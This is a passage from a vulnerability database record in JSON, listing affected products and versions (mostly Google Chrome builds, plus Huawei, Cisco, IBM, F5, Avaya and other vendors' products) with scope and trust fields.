0.3, "vendor": "google", "version": "6.0.466.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.2" }, { "model": "fusionstorage dsware v100r003c02spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.337.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.54" }, { "model": "message networking sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.43" }, { "model": "e9000 blade server ch222 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1032" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1302.0" }, { "model": "nexus switch for nexus series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v70004.1.(2)" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.51" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.945.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.1" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4" }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.895.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.355.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "supercluster", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.21" }, { "model": "e9000 blade server ch221 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.49" }, { "model": "gaia r75", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.234" }, { "model": "galax8800 v100r002c85", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.21" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.103" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big data appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.650.0" }, { "model": "gaia embedded r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.19" }, { "model": "vcenter support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.8" }, { "model": "oceanstor s6800t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.338.0" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.451.0" }, { "model": "vsphere app ha", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.59" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.29" }, { "model": "saas web protection", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.0" }, { "model": "agile controller v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.1" }, { "model": "webex pcnow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.19" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.4" }, { "model": "oceanstor s6800t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "qlogic 20-port 8gb san switch module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.45" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "oceanstor cse v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.15" }, { "model": "power hmc r8.1.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.0" }, { "model": "web element manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.427.0" }, { "model": "e9000 blade server ch242 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v3" }, { "model": "ipso r70.1", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1024" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.43" }, { "model": "oceanstor s5500t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.276.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.117" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "espace u2980 v100r001c10spc102", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.933.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.0" }, { "model": "netauthenticate", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.574.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.936.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.38" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.27" }, { "model": "3722-s51", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "workcentre r14-10 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7775061.090.224.30300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.64" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.320.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.946.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.65" }, { "model": "ads virtual app", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.48" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.888.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.18" }, { "model": "access registrar appliance cisco prime access registrar applianc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.224.0" }, { "model": "rack server rh5885 v100r001c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1678.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.97" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.704.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.60" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1035" }, { "model": "policy assessment and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "ipso r76", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1291.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.68" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.43" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "oceanstor 18800f v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.59" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "espace uc v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.41" }, { "model": "espace uc v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.632.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.158" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.328" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.9" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.2" }, { "model": "aura application server sip core pb26", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "vae v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.899.0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.2" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1029" }, { "model": "gaia r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.571.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.57" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1677.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.82" }, { "model": "esight network v200r003c10spc206", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.734.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.1" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.4" }, { "model": "gaia embedded r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura communication manager sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1310.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.34" }, { "model": "t505 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.342" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.93" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.485.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.678.0" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.16" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "virtual compute appliance software", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "puredata system for analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", 